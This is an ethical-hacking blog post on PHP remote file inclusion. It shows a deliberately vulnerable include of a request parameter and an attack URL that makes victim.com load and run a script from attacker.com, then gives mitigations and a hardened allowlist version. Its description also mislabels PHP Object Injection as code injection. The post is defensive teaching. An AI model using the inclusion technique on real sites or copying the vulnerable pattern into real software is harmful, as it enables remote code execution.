BUG HUNTING - PHP Code Injection Attack | Ethical Hacking| NAHID HASAN TECHNOLOGY

 PHP Code Injection Attack


Risk type: HIGH

Description:

PHP Object Injection is an application-level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context.
A PHP code injection vulnerability allows an attacker to insert malicious PHP code straight into a program/script from an outside source. The added code becomes part of the application itself and runs with the same permissions as the application.

Example:

Let's assume that the PHP script named "script.php" could be found on the following link:
http://www.victim.com/script.php
The page has the following vulnerable code:
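... html header ...
<?php
// Vulnerable: the "page" request parameter reaches include() without validation
$page = $_GET['page'];
include($page);
?>
... html footer ...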
The attacker could host a malicious script ("malicious.php") on some website:
http://www.attacker.com/malicious.php
The code within that script, which the attacker wants to inject, could look like:
<?php
phpinfo();
?>
The attacker could inject malicious code using the following URL in a browser:
http://www.victim.com/script.php?page=http://www.attacker.com/malicious.php
The end result is that the exploited website executes the command phpinfo() within "script.php".

Mitigation:

  • Validate input variables properly.
  • Use a whitelist of acceptable inputs that strictly conform to specifications.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules.
  • Check for invalid characters and set up all the page files in a separate directory.
  • Use library calls rather than external processes to recreate the desired functionality.
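
The allowlist, invalid-character and separate-directory mitigations applied to script.php, as an added example that is not code from the original post. The `pages` directory, the page names and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for include($page) in script.php.
// PAGES_DIR, ALLOWED_PAGES and resolve_page() are hypothetical names.

const PAGES_DIR = __DIR__ . '/pages';                 // holds only includable page files
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // allowlist of page names

/**
 * Map the user-supplied "page" value to a file inside PAGES_DIR,
 * or return null when the value is not acceptable.
 */
function resolve_page($input): ?string
{
    // Missing or non-string input (for example ?page[]=x) is rejected.
    if (!is_string($input)) {
        return null;
    }
    // Length and character check: 1-32 lowercase letters, digits, "_" or "-".
    // This excludes "/", "\", ".", ":" and NUL, so no URL, stream wrapper
    // or directory traversal sequence can pass.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $input)) {
        return null;
    }
    // Allowlist: only page names known in advance are served.
    if (!in_array($input, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and stay inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $input . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$file = resolve_page($_GET['page'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

With this in place, the request `script.php?page=http://www.attacker.com/malicious.php` fails the character check and returns a 404 instead of reaching `include`. Keeping `allow_url_include` set to `Off` in php.ini additionally stops `include` from fetching remote URLs at all.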
Thank You✌✌✌
